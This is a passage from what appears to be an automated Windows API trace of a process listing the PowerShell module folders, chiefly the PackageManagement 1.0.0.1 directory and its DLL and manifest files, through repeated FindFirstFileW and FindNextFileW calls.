cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0281.784] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0281.784] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0281.785] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0281.785] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0281.785] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0281.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0281.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.785] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.785] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.786] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.786] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0281.786] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.786] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.787] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.787] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.787] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0281.787] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0281.787] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.788] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.788] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.788] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.788] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0281.788] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0281.789] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0281.789] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0281.789] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0281.789] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0281.789] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0281.789] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0281.789] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0281.790] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0281.790] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0281.790] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0281.790] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.790] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.791] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.791] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0281.791] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0281.791] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0281.791] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0281.791] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0281.792] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0281.792] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0281.792] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0281.792] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0281.792] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0281.792] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0281.792] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.792] FindClose (in: 